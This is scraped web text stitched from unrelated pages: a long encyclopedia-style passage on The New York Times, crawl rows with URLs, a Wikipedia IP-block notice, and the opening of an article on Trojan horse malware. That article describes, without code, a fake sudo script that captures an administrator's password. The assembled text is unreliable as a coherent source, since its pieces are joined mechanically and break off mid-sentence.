In 2011, the Times began hosting the DealBook Summit, an annual conference hosted by Sorkin. 200 During the COVID 19 pandemic, The New York Times hosted the DealBook Online Summit in 2020 201 and 2021. 202 The 2022 DealBook Summit featured — among other speakers — former vice president Mike Pence and Israeli prime minister Benjamin Netanyahu, 203 culminating in an interview with former FTX chief executive Sam Bankman-Fried; FTX had filed for bankruptcy several weeks prior. 204 The 2023 DealBook Summit's speakers included vice president Kamala Harris, Israeli president Isaac Herzog, and businessman Elon Musk. 200 In June 2010, The New York Times licensed the political blog FiveThirtyEight in a three-year agreement. 205 The blog, written by Nate Silver, had garnered attention during the 2008 presidential election for predicting the elections in forty-nine of fifty states. FiveThirtyEight appeared on nytimes.com in August. 206 According to Silver, several offers were made for the blog; Silver wrote that a merger of unequals must allow for editorial sovereignty and resources from the acquirer, comparing himself to Groucho Marx. 207 According to The New Republic, FiveThirtyEight drew as much as a fifth of the traffic to nytimes.com during the 2012 presidential election. 208 In July 2013, FiveThirtyEight was sold to ESPN. 209 In an article following Silver's exit, public editor Margaret Sullivan wrote that he was disruptive to the Times's culture for his perspective on probability-based predictions and scorn for polling — having stated that punditry is "fundamentally useless", comparing him to Billy Beane, who implemented sabermetrics in baseball. According to Sullivan, his work was criticized by several notable political journalists. 210 The New Republic obtained a memo in November 2013 revealing then-Washington bureau chief David Leonhardt's ambitions to establish a data-driven newsletter with presidential historian Michael Beschloss, graphic designer Amanda Cox, economist Justin Wolfers, and The New Republic journalist Nate Cohn. 211 By March, Leonhardt had amassed fifteen employees from within The New York Times; the newsletter's staff included individuals who had created the Times's dialect quiz, fourth down analyzer, and a calculator for determining buying or renting a home. 212 The Upshot debuted in April 2014. 213 Fast Company reviewed an article about Illinois Secure Choice — a state-funded retirement saving system — as "neither a terse news item, nor a formal financial advice column, nor a politically charged response to economic policy", citing its informal and neutral tone. 214 The Upshot developed "the needle" for the 2016 presidential election and 2020 presidential elections, a thermometer dial displaying the probability of a candidate winning. 215 In January 2016, Cox was named editor of The Upshot. 216 Kevin Quealy was named editor in June 2022. 217 According to an internal readership poll conducted by The New York Times in 2019, eighty-four percent of readers identified as liberal. 218 In February 1942, The New York Times crossword debuted in The New York Times Magazine; according to Richard Shepard, the attack on Pearl Harbor in December 1941 convinced then-publisher Arthur Hays Sulzberger of the necessity of a crossword. 219 The New York Times has published recipes since the 1850s and has had a separate food section since the 1940s. 220 In 1961, restaurant critic Craig Claiborne published The New York Times Cookbook, 221 an unauthorized cookbook that drew from the Times's recipes. 222 Since 2010, former food editor Amanda Hesser has published The Essential New York Times Cookbook, a compendium of recipes from The New York Times. 223 The Innovation Report in 2014 revealed that the Times had attempted to establish a cooking website since 1998, but faced difficulties with the absence of a defined data structure. 224 In September 2014, The New York Times introduced NYT Cooking, an application and website. 225 Edited by food editor Sam Sifton, 222 the Times's cooking website features 21,000 recipes as of 2022. 226 NYT Cooking features videos as part of an effort by Sifton to hire two former Tasty employees from BuzzFeed. 222 In August 2023, NYT Cooking added personalized recommendations through the cosine similarity of text embeddings of recipe titles. 227 The website also features no-recipe recipes, a concept proposed by Sifton. 228 In May 2016, The New York Times Company announced a partnership with startup Chef'd to form a meal delivery service that would deliver ingredients from The New York Times Cooking recipes to subscribers; 229 Chef'd shut down in July 2018 after failing to accrue capital and secure financing. 230 The Hollywood Reporter reported in September 2022 that the Times would expand its delivery options to US$95 cooking kits curated by chefs such as Nina Compton, Chintan Pandya, and Naoko Takei Moore. That month, the staff of NYT Cooking went on tour with Compton, Pandya, and Moore in Los Angeles, New Orleans, and New York City, culminating in a food festival. 231 In addition, The New York Times offered its own wine club originally operated by the Global Wine Company. The New York Times Wine Club was established in August 2009, during a dramatic decrease in advertising revenue. 232 By 2021, the wine club was managed by Lot18, a company that provides proprietary labels. Lot18 managed the Williams Sonoma Wine Club and its own wine club Tasting Room. 233 The New York Times archives its articles in a basement annex beneath its building known as "the morgue", a venture started by managing editor Carr Van Anda in 1907. The morgue comprises news clippings, a pictures library, and the Times's book and periodicals library. As of 2014, it is the largest library of any media company, dating back to 1851. 234 In November 2018, The New York Times partnered with Google to digitize the Archival Library. 235 Additionally, The New York Times has maintained a virtual microfilm reader known as TimesMachine since 2014. The service launched with archives from 1851 to 1980; in 2016, TimesMachine expanded to include archives from 1981 to 2002. The Times built a pipeline to take in TIFF images, article metadata in XML and an INI file of Cartesian geometry describing the boundaries of the page, and convert it into a PNG of image tiles and JSON containing the information in the XML and INI files. The image tiles are generated using GDAL and displayed using Leaflet, using data from a content delivery network. The Times ran optical character recognition on the articles using Tesseract and shingled and fuzzy string matched the result. 236 The New York Times uses a proprietary 237 content management system known as Scoop for its online content and the Microsoft Word-based content management system CCI for its print content. Scoop was developed in 2008 to serve as a secondary content management system for editors working in CCI to publish their content on the Times's website; as part of The New York Times's online endeavors, editors now write their content in Scoop and send their work to CCI for print publication. Since its introduction, Scoop has superseded several processes within the Times, including print edition planning and collaboration, and features tools such as multimedia integration, notifications, content tagging, and drafts. The New York Times uses private articles for high-profile opinion pieces, such as those written by Russian president Vladimir Putin and actress Angelina Jolie, and for high-level investigations. 238 In January 2012, the Times released Integrated Content Editor (ICE), a revision tracking tool for WordPress and TinyMCE. ICE is integrated within the Times's workflow by providing a unified text editor for print and online editors, reducing the divide between print and online operations. 239 By 2017, 240 The New York Times began developing a new authoring tool to its content management system known as Oak, in an attempt to further the Times's visual efforts in articles and reduce the discrepancy between the mediums in print and online articles. 241 The system reduces the input of editors and supports additional visual mediums in an editor that resembles the appearance of the article. 240 Oak is based on ProseMirror, a JavaScript rich-text editor toolkit, and retains the revision tracking and commenting functionalities of The New York Times's previous systems. Additionally, Oak supports predefined article headers. 242 In 2019, Oak was updated to support collaborative editing using Firebase to update editors's cursor status. Several Google Cloud Functions and Google Cloud Tasks allow articles to be previewed as they will be printed, and the Times's primary MySQL database is regularly updated to update editors on the article status. 243 Since 1895, The New York Times has maintained a manual of style in several forms. The New York Times Manual of Style and Usage was published on the Times's intranet in 1999. 244 The New York Times uses honorifics when referring to individuals. With the AP Stylebook's removal of honorifics in 2000 and The Wall Street Journal's omission of courtesy titles in May 2023, the Times is the only national newspaper that continues to use honorifics. According to former copy editor Merrill Perlman, The New York Times continues to use honorifics as a "sign of civility". 245 The Times's use of courtesy titles led to an apocryphal rumor that the paper had referred to singer Meat Loaf as "Mr. Loaf". 246 Several exceptions have been made; the former sports section and The New York Times Book Review do not use honorifics. 247 A leaked memo following the killing of Osama bin Laden in May 2011 revealed that editors were given a last-minute instruction to omit the honorific from Osama bin Laden's name, consistent with deceased figures of historic significance, such as Adolf Hitler, Napoleon, and Vladimir Lenin. 248 The New York Times uses academic and military titles for individuals prominently serving in that position. 249 In 1986, the Times began to use Ms, 247 and introduced the gender-neutral title Mx. in 2015. 250 The New York Times uses initials when a subject has expressed a preference, such as Donald Trump. 251 The New York Times maintains a strict but not absolute obscenity policy, including phrases. In a review of the Canadian hardcore punk band Fucked Up, music critic Kelefa Sanneh wrote that the band's name—entirely rendered in asterisks—would not be printed in the Times "unless an American president, or someone similar, says it by mistake"; 252 The New York Times did not repeat then-vice president Dick Cheney's use of "fuck" against then-senator Patrick Leahy in 2004 253 or then-vice president Joe Biden's remarks that the passage of the Affordable Care Act in 2010 was a "big fucking deal". 254 The Times's profanity policy has been tested by former president Donald Trump. The New York Times published Trump's Access Hollywood tape in October 2016, containing the words "fuck", "pussy", "bitch", and "tits", the first time the publication had published an expletive on its front page, 255 and repeated an explicit phrase for fellatio stated by then-White House communications director Anthony Scaramucci in July 2017. 256 The New York Times omitted Trump's use of the phrase "shithole countries" from its headline in favor of "vulgar language" in January 2018. 257 The Times banned certain words, such as "bitch", "whore", and "sluts", from Wordle in 2022. 258 Journalists for The New York Times do not write their own headlines, but rather copy editors who specifically write headlines. The Times's guidelines insist headline editors get to the main point of an article but avoid giving away endings, if present. Other guidelines include using slang "sparingly", avoiding tabloid headlines, not ending a line on a preposition, article, or adjective, and chiefly, not to pun. The New York Times Manual of Style and Usage states that wordplay, such as "Rubber Industry Bounces Back", is to be tested on a colleague as a canary is to be tested in a coal mine; "when no song bursts forth, start rewriting". 259 The New York Times has amended headlines due to controversy. In 2019, following two back-to-back mass shootings in El Paso and Dayton, the Times used the headline, "Trump Urges Unity vs. Racism", to describe then-president Donald Trump's words after the shootings. After criticism from FiveThirtyEight founder Nate Silver, the headline was changed to, "Assailing Hate But Not Guns". 260 Online, The New York Times's headlines do not face the same length restrictions as headlines that appear in print; print headlines must fit within a column, often six words. Additionally, headlines must "break" properly, containing a complete thought on each line without splitting up prepositions and adverbs. Writers may edit a headline to fit an article more aptly if further developments occur. The Times uses A B testing for articles on the front page, placing two headlines against each other. At the end of the test, the headlines that receives more traffic is chosen. 261 The alteration of a headline regarding intercepted Russian data used in the Mueller special counsel investigation was noted by Trump in a March 2017 interview with Time, in which he claimed that the headline used the word "wiretapped" in the print version of the paper on January 20, while the digital article on January 19 omitted the word. The headline was intentionally changed in the print version to use "wiretapped" in order to fit within the print guidelines. 262 The nameplate of The New York Times has been unaltered since 1967. In creating the initial nameplate, Henry Jarvis Raymond sought to model The London Times, which used a Blackletter style called Textura, popularized following the fall of the Western Roman Empire and regional variations of Alcuin's script, as well as a period. With the change to The New-York Times on September 14, 1857, the nameplate followed. Under George Jones, the terminals of the "N", "r", and "s" were intentionally exaggerated into swashes. The nameplate in the January 15, 1894, issue trimmed the terminals once more, smoothed the edges, and turned the stem supporting the "T" into an ornament. The hyphen was dropped on December 1, 1896, after Adolph Ochs purchased the paper. The descender of the "h" was shortened on December 30, 1914. The largest change to the nameplate was introduced on February 21, 1967, when type designer Ed Benguiat redesigned the logo, most prominently turning the arrow ornament into a diamond. Notoriously, the new logo dropped the period that remained with the Times up until that point; one reader compared the omission of the period to "performing plastic surgery on Helen of Troy. Picture editor John Radosta worked with a New York University professor to determine that dropping the period saved the paper US$41.28 (equivalent to $377.21 in 2023). 263 As of December 2023, The New York Times has printed sixty thousand issues, a statistic represented in the paper's masthead to the right of the volume number, the Times's years in publication written in Roman numerals. 264 The volume and issues are separated by four dots representing the edition number of that issue; on the day of the 2000 presidential election, the Times was revised four separate times, necessitating the use of an em dash in place of an ellipsis. 265 The em dash issue was printed hundreds times over before being replaced by the one-dot issue. Despite efforts by newsroom employees to recycle copies sent to The New York Times's office, several copies were kept, including one put on display at the Museum at The Times. 266 From February 7, 1898, to December 31, 1999, the Times's issue number was incorrect by five hundred issues, an error suspected by The Atlantic to be the result of a careless front page type editor. The misreporting was noticed by news editor Aaron Donovan, who was calculating the number of issues in a spreadsheet and noticed the discrepancy. The New York Times celebrated fifty thousand issues on March 14, 1995, an observance that should have occurred on July 26, 1996. 267 The New York Times has reduced the physical size of its print edition while retaining its broadsheet format. The New-York Daily Times debuted at 18 inches (460 mm) across. By the 1950s, the Times was being printed at 16 inches (410 mm) across. In 1953, an increase in paper costs to US$10 (equivalent to $113.88 in 2023) a ton increased newsprint costs to US$21.7 million (equivalent to $308,616,417.91 in 2023) On December 28, 1953, the pages were reduced to 15.5 inches (390 mm). On February 14, 1955, a further reduction to 15 inches (380 mm) occurred, followed by 14.5 and 13.5 inches (370 and 340 mm). On August 6, 2007, the largest cut occurred when the pages were reduced to 12 inches (300 mm), k a decision that other broadsheets had previously considered. Then-executive editor Bill Keller stated that a narrower paper would be more beneficial to the reader but acknowledged a net loss in article space of five percent. 268 In 1985, The New York Times Company established a minority stake in a US$21.7 million (equivalent to $308,616,417.91 in 2023) newsprint plant in Clermont, Quebec through Donahue Malbaie. 269 The company sold its equity interest in Donahue Malbaie in 2017. 270 The New York Times often uses large, bolded headlines for major events. For the print version of the Times, these headlines are written by one copy editor, reviewed by two other copy editors, approved by the masthead editors, and polished by other print editors. The process is completed before 8 p.m., but it may be repeated if further development occur, as did take place during the 2020 presidential election. On the day Joe Biden was declared the winner, The New York Times utilized a "hammer headline" reading, "Biden Beats Trump", in all caps and bolded. A dozen journalists discussed several potential headlines, such as "It's Biden" or "Biden's Moment", and prepared for a Donald Trump victory, in which they would use "Trump Prevails". 271 During Trump's first impeachment, the Times drafted the hammer headline, "Trump Impeached". The New York Times altered the ligatures between the E and the A, as not doing so would leave a noticeable gap due to the stem of the A sloping away from the E. The Times reused the tight kerning for "Biden Beats Trump" and Trump's second impeachment, which simply read, "Impeached". 272 In cases where two major events occur on the same day or immediately after each other, The New York Times has used a "paddle wheel" headline, where both headlines are used but split by a line. The term dates back to August 8, 1959, when it was revealed that the United States was monitoring Soviet missile firings and when Explorer 6 — shaped like a paddle wheel — launched. Since then, the paddle wheel has been used several times, including on January 21, 1981, when Ronald Reagan was sworn in minutes before Iran released fifty-two American hostages, ending the Iran hostage crisis. At the time, most newspapers favored the end of the hostage crisis, but the Times placed the inauguration above the crisis. Since 1981, the paddle wheel has been used twice; on July 26, 2000, when the 2000 Camp David Summit ended without an agreement and when Bush announced that Dick Cheney would be his running mate, and on June 24, 2016, when the United Kingdom European Union membership referendum passed, beginning Brexit, and when the Supreme Court deadlocked in United States v. Texas. 273 The New York Times has run editorials from its editorial board on the front page twice. On June 13, 1920, the Times ran an editorial opposing Warren G. Harding, who was nominated during that year's Republican Party presidential primaries. 274 Amid growing acceptance to run editorials on the front pages 275 from publications such as the Detroit Free Press, The Patriot-News, The Arizona Republic, and The Indianapolis Star, The New York Times ran an editorial on its front page on December 5, 2015, following a terrorist attack in San Bernardino, California, in which fourteen people were killed. 276 The editorial advocates for the prohibition of "slightly modified combat rifles" used in the San Bernardino shooting and "certain kinds of ammunition". 274 Conservative figures, including Texas senator Ted Cruz, The Weekly Standard editor Bill Kristol, Fox Friends co-anchor Steve Doocy, and then-New Jersey governor Chris Christie criticized the Times. Talk radio host Erick Erickson acquired an issue of The New York Times to fire several rounds into the paper, posting a picture online. 277 Since 1997, 278 The New York Times's primary distribution center is located in College Point, Queens. The facility is 300,000 sq ft (28,000 m2) and employs 170 people as of 2017. The College Point distribution center prints 300,000 to 800,000 newspapers daily. On most occasions, presses start before 11 p.m. and finish before 3 a.m. A robotic crane grabs a roll of newsprint and several rollers ensure ink can be printed on paper. The final newspapers are wrapped in plastic and shipped out. 279 As of 2018, the College Point facility accounted for 41 percent of production. Other copies are printed at 26 other publications, such as The Atlanta Journal-Constitution, The Dallas Morning News, The Santa Fe New Mexican, and the Courier Journal. With the decline of newspapers, particularly regional publications, the Times must travel further; for example, newspapers for Hawaii are flown from San Francisco on United Airlines, and Sunday papers are flown from Los Angeles on Hawaiian Airlines. Computer glitches, mechanical issues, and weather phenomena affect circulation but do not stop the paper from reaching customers. 280 The College Point facility prints over two dozen other papers, including The Wall Street Journal and USA Today. 281 The New York Times has halted its printing process several times to account for major developments. The first printing stoppage occurred on March 31, 1968, when then-president Lyndon B. Johnson announced that he would not seek a second term. Other press stoppages include May 19, 1994, for the death of former first lady Jacqueline Kennedy Onassis, and July 17, 1996, for Trans World Airlines Flight 800. The 2000 presidential election necessitated two press stoppages. Al Gore appeared to concede on November 8, forcing then-executive editor Joseph Lelyveld to stop the Times's presses to print a new headline, "Bush Appears to Defeat Gore", with a story that stated George W. Bush was elected president. However, Gore held off his concession speech over doubts over Florida. Lelyveld reran the headline, "Bush and Gore Vie for an Edge". Since 2000, three printing stoppages have been issued for the death of William Rehnquist on September 3, 2005, for the killing of Osama bin Laden on May 1, 2011, and for the passage of the Marriage Equality Act in the New York State Assembly and subsequent signage by then-governor Andrew Cuomo on June 24, 2011. 282 The New York Times website is hosted at nytimes.com. It has undergone several major redesigns and infrastructure developments since its debut. In April 2006, The New York Times redesigned its website with an emphasis on multimedia. 283 In preparation for Super Tuesday in February 2008, the Times developed a live election system using the Associated Press's File Transfer Protocol (FTP) service and a Ruby on Rails application; nytimes.com experienced its largest traffic on Super Tuesday and the day after. 284 The NYTimes application debuted with the introduction of the App Store on July 10, 2008. Engadget's Scott McNulty wrote critically of the app, negatively comparing it to The New York Times's mobile website. 285 An iPad version with select articles was released on April 3, 2010, with the release of the first-generation iPad. 286 In October, The New York Times expanded NYT Editors' Choice to include the paper's full articles. NYT for iPad was free until 2011. 287 The Times applications on iPhone and iPad began offering in-app subscriptions in July 2011. 288 The Times released a web application for iPad — featuring a format summarizing trending headlines on Twitter 289 — and a Windows 8 application in October 2012. 290 Efforts to ensure profitability through an online magazine and a "Need to Know" subscription emerged in Adweek in July 2013. 291 In March 2014, The New York Times announced three applications — NYT Now, an application that offers pertinent news in a blog format, and two unnamed applications, later known as NYT Opinion 292 and NYT Cooking 224 — to diversify its product laterals. 293 The Daily is the modern front page of The New York Times. —Sam Dolnick, speaking to Intelligencer in January 2020 294 The New York Times manages several podcasts, including multiple podcasts with Serial Productions. The Times's longest-running podcast is The Book Review Podcast, 295 debuting as Inside The New York Times Book Review in April 2006. 296 The New York Times's defining podcast is The Daily, 294 a daily news podcast hosted by Michael Barbaro and, since March 2022, Sabrina Tavernise. 297 The podcast debuted on February 1, 2017. 298 In October 2021, The New York Times began testing "New York Times Audio", an application featuring podcasts from the Times, audio versions of articles — including from other publications through Audm, and archives from This American Life. 299 The application debuted in May 2023 exclusively on iOS for Times subscribers. New York Times Audio includes exclusive podcasts such as The Headlines, a daily news recap, and Shorts, short audio stories under ten minutes. In addition, a "Reporter Reads" section features Times journalists reading their articles and providing commentary. 300 The New York Times has used video games as part of its journalistic efforts, among the first publications to do so, 301 contributing to an increase in Internet traffic; 302 the publication has also developed its own video games. In 2014, The New York Times Magazine introduced Spelling Bee, a word game in which players guess words from a set of letters in a honeycomb and are awarded points for the length of the word and receive extra points if the word is a pangram. 303 The game was proposed by Will Shortz, created by Frank Longo, and has been maintained by Sam Ezersky. In May 2018, Spelling Bee was published on nytimes.com, furthering its popularity. 304 In February 2019, the Times introduced Letter Boxed, in which players form words from letters placed on the edges of a square box, 305 followed in June 2019 by Tiles, a matching game in which players form sequences of tile pairings, and Vertex, in which players connect vertices to assemble an image. 306 In July 2023, The New York Times introduced Connections, in which players identify groups of words that are connected by a common property. 307 In April, the Times introduced Digits, a game that required using operations on different values to reach a set number; Digits was shut down in August. 308 In March 2024, The New York Times released Strands, a themed word search. 309 In January 2022, The New York Times Company acquired Wordle, a word game developed by Josh Wardle in 2021, at a valuation in the "low-seven figures". 310 The acquisition was proposed by David Perpich, a member of the Sulzberger family who proposed the purchase to Knight 311 over Slack after reading about the game. 312 The Washington Post purportedly considered acquiring Wordle, according to Vanity Fair. 311 At the 2022 Game Developers Conference, Wardle stated that he was overwhelmed by the volume of Wordle facsimiles and overzealous monetization practices in other games. 313 Concerns over The New York Times monetizing Wordle by implementing a paywall mounted; 314 Wordle is a client-side browser game and can be played offline by downloading its webpage. 315 Wordle moved to the Times's servers and website in February. 316 The game was added to the NYT Games application in August, 317 necessitating it be rewritten in the JavaScript library React. 318 In November, The New York Times announced that Tracy Bennett would be the Wordle's editor. 319 The New York Times Magazine and The Boston Globe Magazine are the only weekly Sunday magazines following The Washington Post Magazine's cancellation in December 2022. 320 In February 2016, The New York Times introduced a Spanish website, The New York Times en Espa ol. 321 The website, intended to be read on mobile devices, would contain translated articles from the Times and reporting from journalists based in Mexico City. 322 The Times en Espa ol's style editor is Paulina Chavira, who has advocated for pluralistic Spanish to accommodate the variety of nationalities in the newsroom's journalists and wrote a stylebook for The New York Times en Espa ol 323 Articles the Times intends to publish in Spanish are sent to a translation agency and adapted for Spanish writing conventions; the present progressive tense may be used for forthcoming events in English, but other tenses are preferable in Spanish. The Times en Espa ol consults the Real Academia Espa ola and Fund u and frequently modifies the use of diacritics — such as using an acute accent for the C rtel de Sinaloa but not the Cartel de Medell n — and using the gender-neutral pronoun elle. 324 Headlines in The New York Times en Espa ol are not capitalized. The Times en Espa ol publishes El Times, a newsletter led by Elda Cant intended for all Spanish speakers. 325 In September 2019, The New York Times ended The New York Times en Espa ol's separate operations. 326 A study published in The Translator in 2023 found that the Times en Espa ol engaged in tabloidization. 327 In June 2012, The New York Times introduced a Chinese website, , in response to Chinese editions created by The Wall Street Journal and the Financial Times. Conscious to censorship, the Times established servers outside of China and affirmed that the website would uphold the paper's journalistic standards; the government of China had previously blocked articles from nytimes.com through the Great Firewall, 328 and the website was blocked in China until August 2001 after then-general secretary Jiang Zemin met with journalists from The New York Times. 329 Then-foreign editor Joseph Kahn assisted in the establishment of cn.nytimes.com, an effort that contributed to his appointment as executive editor in April 2022. 330 In October, published an article detailing the wealth of then-premier Wen Jiabao's family. In response, the government of China blocked access to nytimes.com and cn.nytimes.com and references to the Times and Wen were censored on microblogging service Sina Weibo. 329 In March 2015, a mirror of and the website for GreatFire were the targets for a government-sanctioned distributed denial of service attack on GitHub in March 2015, disabling access to the service for several days. 331 Chinese authorities requested the removal of The New York Times's news applications from the App Store in December 2016. 332 As of 2023, The New York Times has received 137 Pulitzer Prizes, 333 the most of any publication. 334 The New York Times is considered a newspaper of record in the United States. l The Times is the largest metropolitan newspaper in the United States; 338 as of 2022, The New York Times is the second-largest newspaper by print circulation in the United States behind The Wall Street Journal. 193 A study published in Science, Technology, Human Values in 2013 found that The New York Times received more citations in academic journals than the American Sociological Review, Research Policy, or the Harvard Law Review. 339 With sixteen million unique records, the Times is the third-most referenced source in Common Crawl, a collection of online material used in datasets such as GPT 3, behind Wikipedia and a United States patent database. 340 The New Yorker's Max Norman wrote in March 2023 that the Times has shaped mainstream English usage. 341 In a January 2018 article for The Washington Post, Margaret Sullivan stated that The New York Times affects the "whole media and political ecosystem". 342 The New York Times's nascent success has led to concerns over media consolidation, particularly amid the decline of newspapers. In 2006, economists Lisa George and Joel Waldfogel examined the consequences of the Times's national distribution strategy and audience with circulation of local newspapers, finding that local circulation decreased among college-educated readers. 343 The effect of The New York Times in this manner was observed in The Forum of Fargo-Moorhead, the newspaper of record for Fargo, North Dakota. 344 Axios founder Jim VandeHei opined that the Times is "going to basically be a monopoly" in an opinion piece written by then-media columnist and former BuzzFeed News editor-in-chief Ben Smith; in the article, Smith cites the strength of The New York Times's journalistic workforce, broadening content, and the expropriation of Gawker editor-in-chief Choire Sicha, Recode editor-in-chief Kara Swisher, and Quartz editor-in-chief Kevin Delaney. Smith compared the Times to the New York Yankees during their 1927 season containing Murderers' Row. 345 The New York Times has received criticism for its coverage of the Israel Hamas war, 346 and the paper has been accused of holding both an anti-Palestinian 347 and an anti-Israeli 348 bias. In April 2024, The Intercept reported that an internal memorandum from November 2023 instructed journalists to reduce using the terms "genocide" and "ethnic cleansing" and to avoid using the phrase "occupied territory" in the context of Palestinian land, Palestine except in rare circumstances, and the term "refugee camps" to describe areas of Gaza despite recognition from the United Nations. A spokesperson from the Times stated that issuing guidance was standard practice. An analysis by The Intercept noted that The New York Times described Israeli deaths as a massacre nearly sixty times, but had only described Palestinian deaths as a massacre once. 349 In December 2023, The New York Times published an investigation titled 'Screams Without Words': How Hamas Weaponized Sexual Violence on Oct. 7", alleging that Hamas weaponized sexual and gender-based violence during its armed incursion on Israel. 350 The investigation was the subject of an article from The Intercept questioning the journalistic acumen of Anat Schwartz, a filmmaker involved in the inquiry who had no prior reporting experience and agreed with a post stating Israel should "violate any norm, on the way to victory", doubting the veracity of the opening claim that Gal Abdush was raped in a timespan disputed by her family, and alleging that the Times was pressured by the Committee for Accuracy in Middle East Reporting in America. 351 The New York Times initiated an inquiry that received criticism from NewsGuild of New York president Susan DeCarava for purported racial targeting; 352 the Times's investigation concluded in ambiguity, but found that journalistic material was handled improperly. 353 The New York Times has received criticism regarding its coverage of transgender people. When it published an opinion piece by Weill Cornell Medicine professor Richard A. Friedman called "How Changeable Is Gender? in August 2015, 354 Vox's German Lopez criticized Friedman as suggesting that parents and doctors might be right in letting children suffer from severe dysphoria in case something changes down the line, and as implying that conversion therapy may work for transgender children. 355 In February 2023, nearly one thousand 356 current and former Times writers and contributors wrote an open letter addressed to standards editor Philip B. Corbett, criticizing the paper's coverage of transgender, non binary, and gender-nonconforming people; some of the Times' articles have been cited in state legislatures attempting to justify criminalizing gender-affirming care. 357 Contributors wrote in the open letter that "the Times has in recent years treated gender diversity with an eerily familiar mix of pseudoscience and euphemistic, charged language, while publishing reporting on trans children that omits relevant information about its sources. m 1 2 3 4 5 6 7 NBC News Wall Street Journal Politico MSNBC CNBC Telemundo Bloomberg Industry Group Washington Examiner Boston Globe Washington Blade Fox News CBS News Radio AP Radio PBS VOA Time Yahoo News Daily Caller EWTN CBS News Bloomberg News McClatchy NY Post TheGrio Washington Times Salem Radio CBN Cheddar News Hearst TV AP NPR Foreign pool The Hill Regionals Newsmax Gray TV Spectrum News ABC News Washington Post Agence France-Presse Fox Business Fox News Radio CSM Roll Call Al JazeeraNexstar Scripps News Reuters NY Times LA Times Univision AURN RealClearPolitics Daily Beast Dallas Morning News BBC Newsweek CNN USA Today ABC News RadioDaily Mail National JournalHuffPostFinancial Times The Guardian |
367 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Special:EditPage/Web_scraping | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Pages transcluded onto the current version of this page (help): Return to Web scraping. |
368 | https://en.wikipedia.org/wiki/Data_scraping | https://he.wikipedia.org/wiki/%D7%92%D7%A8%D7%99%D7%93%D7%AA_%D7%A0%D7%AA%D7%95%D7%A0%D7%99%D7%9D | ( : , : Data scraping) 1 . , , . , , . . : |
369 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Trojan_horse_(computing) | In computing, a Trojan horse (or simply Trojan) is any malware that misleads users of its true intent by disguising itself as a standard program. The term is derived from the ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. 1 Trojans are generally spread by some form of social engineering. For example, where a user is duped into executing an email attachment disguised to appear innocuous (e.g., a routine form to be filled in), or by clicking on a fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller who can then have unauthorized access to the affected computer. 2 Ransomware attacks are often carried out using a Trojan. Unlike computer viruses and worms, Trojans generally do not attempt to inject themselves into other files or otherwise propagate themselves. 3 It is not clear where or when the concept, and this term for it, was first used, but by 1971 the first Unix manual assumed its readers knew both: 4 Another early reference is in a US Air Force report in 1974 on the analysis of vulnerability in the Multics computer systems. 5 It was made popular by Ken Thompson in his 1983 Turing Award acceptance lecture "Reflections on Trusting Trust", 6 subtitled: "To what extent should one trust a statement that a program is free of Trojan horses? Perhaps it is more important to trust the people who wrote the software. He mentioned that he knew about the possible existence of Trojans from a report on the security of Multics. 7 8 Once installed, Trojans may perform a range of malicious actions. Many tend to contact one or more Command and Control (C2) servers across the Internet and await instruction. Since individual Trojans typically use a specific set of ports for this communication, it can be relatively simple to detect them. Moreover, other malware could potentially "take over" the Trojan, using it as a proxy for malicious action. 9 In German-speaking countries, spyware used or made by the government is sometimes called govware. Govware is typically a Trojan software used to intercept communications from the target computer. Some countries like Switzerland and Germany have a legal framework governing the use of such software. 10 11 Examples of govware Trojans include the Swiss MiniPanzer and MegaPanzer 12 and the German "state Trojan" nicknamed R2D2. 10 German govware works by exploiting security gaps unknown to the general public and accessing smartphone data before it becomes encrypted via other applications. 13 Due to the popularity of botnets among hackers and the availability of advertising services that permit authors to violate their users' privacy, Trojans are becoming more common. According to a survey conducted by BitDefender from January to June 2009, "Trojan-type malware is on the rise, accounting for 83% of the global malware detected in the world. Trojans have a relationship with worms, as they spread with the help given by worms and travel across the internet with them. 14 BitDefender has stated that approximately 15% of computers are members of a botnet, usually recruited by a Trojan infection. 15 Recent investigations have revealed that the Trojan horse method has been used as an attack on cloud computing systems. A Trojan attack on cloud systems tries to insert an application or service into the system that can impact the cloud services by changing or stopping the functionalities. When the cloud system identifies the attacks as legitimate, the service or application is performed which can damage and infect the cloud system. 16 A Trojan horse is a program that purports to perform some legitimate function, yet upon execution it compromises the user's security. 17 A simple example is the following malicious version of the Linux sudo command. An attacker would place this script in a publicly writable directory (e.g., tmp). If an administrator happens to be in this directory and executes sudo, then the Trojan may execute, compromising the administrator's password. To prevent a sudo Trojan horse, set the . entry in the PATH environment variable to be located at the tail end. 18 For example: PATH usr local bin: usr bin:.. Having . somewhere in the PATH is convenient, but there is a catch. 19 Another example is the following malicious version of the Linux ls command. However, the filename is not ls; instead, it is sl. An attacker would place this script in a publicly writable directory 